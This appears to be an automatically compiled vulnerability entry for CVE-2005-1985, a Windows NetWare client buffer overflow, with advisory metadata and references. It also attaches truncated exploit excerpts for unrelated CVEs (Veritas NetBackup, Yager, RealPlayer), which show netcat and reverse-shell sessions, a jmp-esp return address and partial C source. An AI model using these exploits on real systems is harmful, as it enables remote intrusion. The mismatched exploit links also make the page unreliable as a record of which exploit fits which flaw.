CVE-2005-1985
Published 2005-10-13
Priority: P349 high
CVSS 2.0: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
EPSS: 36.33% (98.3rd percentile)
The Client Service for NetWare (CSNW) on Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 SP1 and earlier, allows remote attackers to execute arbitrary code due to an "unchecked buffer" when processing certain crafted network messages.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | windows_2003_server | — | — |
| microsoft | windows_2003_server | — | — |
No detection rules found.
Exploit-DB: Veritas NetBackup 4/5 - Volume Manager Daemon Remote Buffer Overflow (CVE-2005-3116, exploitdb, 2006-01-16)
---
/*
DESCRIPTION
Veritas NetBackup Stack Overflow (tcp/13701)
"Volume Manager Daemon" Module
Advisories
http://www.idefense.com/intelligence/vulnerabilities/display.php?id=336
http://www.frsirt.com/english/advisories/2005/2349
USAGE
C:\NetBackup>nb 192.168.0.2 4444 192.168.0.200 0
Veritas NetBackup v4/v5 "Volume Manager Daemon" Stack Overflow.
Sending first buffer.
Sending second buffer.
C:\NetBackup>nc 192.168.0.200 4444
Microsoft Windows 2000 [versie 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>
INFORMATION
I wrote this just for educational purposes :).
Because the buffer is only very small, I had to write small shellcode.
The code is less than 100 bytes, and there are 6 bytes left.
Exploit-DB: Yager 5.24 - Remote Buffer Overflow (CVE-2005-1163, exploitdb, 2005-04-25)
---
/*
*
* Yager > 1
* --[ sending handshake [UDP]...done!
* --[ reading server response [UDP]...done!
* --[ server port: 1089
* --[ connecting to 192.168.2.100:1089 [TCP]...done!
* --[ exploiting WinXP Pro SP1 GER
* --[ ret: 0x300686bd [ jmp esp in binkw32.dll ]
* --[ exploiting packet overflow...
* --[ sending packet...done!
* --[ starting reverse handler [port: 1337]...done!
* --[ incomming connection from: 192.168.2.100
* --[ b0x pwned - h4ve phun
* Microsoft Windows XP [Version 5.1.2600]
* (C) Copyright 1985-2001 Microsoft Corp.
*
* C:\Yager>
*
*/
#include
#include
#include
#include
#define PORT_UDP 34855
#define RED "\E[31m\E[1m"
#define GREEN "\E[32m\E[1m"
#define YELLOW "\E[33m\E[1m"
#define BLUE "\E[34m\E[1m"
#define NORMAL "\E[m"
/*
*
*
Exploit-DB: RealNetworks RealPlayer 10 - '.smil' Local Buffer Overflow (CVE-2005-0455, exploitdb, 2005-03-07)
---
/* RealPlayer .smil file buffer overflow
Coded by nolimit@CiSO & Buzzdee
greets to COREiSO & #news & flare & class101 & ESI & RVL & everyone else I forget
This uses a seh overwrite method, which takes advantage of the SEH being placed
in multiple locations over the different OS's. Because of this, it should be
completely universal. :).
Also, we added SEH for enterprise and Standard, if you have a diff 2k3 then deal with it and write your own in.
C:\tools>nc -vv SERVER 1554
SERVER [192.168.1.93] 1554 (?) open
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\Program Files\Real\RealPlayer>
*/
#include
#include
#include
char pre[]=
"\n"
" \n"
" \n"
" \n"
" \n"
" \n"
" \n"
" "
"";
char ove
No writeups or analysis indexed.
References:
http://secunia.com/advisories/17165
http://securitytracker.com/id?1015041
http://www.osvdb.org/19922
http://www.securityfocus.com/bid/15066
https://docs.microsoft.com/en-us/security-updates/securitybulletins/2005/ms05-046
https://exchange.xforce.ibmcloud.com/vulnerabilities/21700
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1106
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1210
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1536
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1544
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A910